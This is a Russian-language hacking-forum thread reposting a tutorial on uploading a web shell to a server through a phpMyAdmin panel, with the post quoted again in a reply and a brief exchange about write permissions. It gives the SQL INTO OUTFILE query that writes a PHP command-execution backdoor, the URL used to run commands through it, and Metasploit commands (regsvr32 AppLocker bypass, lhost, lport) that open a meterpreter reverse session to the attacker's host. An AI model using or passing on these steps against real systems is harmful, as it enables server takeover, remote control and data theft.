• XSS.stack #1 – первый литературный журнал от юзеров форума

Загрузка shell в WEB-сервер. PhpMyAdmin

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP.

Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.

Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь: https://www.phpmyadmin.net

Заходим в панель управления phpmyadmin и создаем новую базу данных:

b1043a6d2933e8bcd8cd7.png

Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.
Код:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

1e853e72a674c9670c7d3.png

Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:

2fef7a98814c66737e179.png

Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.

Код:
 127.0.0.1/backdoor.php?cmd=systeminfo

460f53c61864226bec76c.png

Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.

Запускаем Msfconsole и используем следующий эксплоит:
Код:
 use exploit/windows/misc/regsvr32_applocker_bypass_server
Код:
 set lhost 172.16.0.192
Код:
 set lport 4444
Код:
 exploit

244413bce3dc388b6e6fd.png

Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=

Код:
 127.0.0.1/backdoor.php?cmd=выделенный текст

8382b58ab6f7caab5646d.png

Как результат, получаем активную сессию meterpreter:

ce1432ccd5377f1cfb465.png

На этом все. Спасибо за внимание.

(c) Vander
источник: codeby
 
Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP.

Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.

Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь: https://www.phpmyadmin.net

Заходим в панель управления phpmyadmin и создаем новую базу данных:

b1043a6d2933e8bcd8cd7.png

Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.
Код:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”

1e853e72a674c9670c7d3.png

Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:

2fef7a98814c66737e179.png

Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.

Код:
 127.0.0.1/backdoor.php?cmd=systeminfo

460f53c61864226bec76c.png

Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.

Запускаем Msfconsole и используем следующий эксплоит:
Код:
 use exploit/windows/misc/regsvr32_applocker_bypass_server
Код:
 set lhost 172.16.0.192
Код:
 set lport 4444
Код:
 exploit

244413bce3dc388b6e6fd.png

Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=

Код:
 127.0.0.1/backdoor.php?cmd=выделенный текст

8382b58ab6f7caab5646d.png

Как результат, получаем активную сессию meterpreter:

ce1432ccd5377f1cfb465.png

На этом все. Спасибо за внимание.

(c) Vander
источник: codeby

в данном примере мы юзерпхпмуадмин=рут?если юзерпхпмуадмин=!рут есть возможность стать рут,или иметь права на запись,создание файлов?
 
в данном примере мы юзерпхпмуадмин=рут?если юзерпхпмуадмин=!рут есть возможность стать рут,или иметь права на запись,создание файлов?
Если права на запись у пользователя есть, то сработает данный способ. Ну а если нет, то ищи другой способ.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх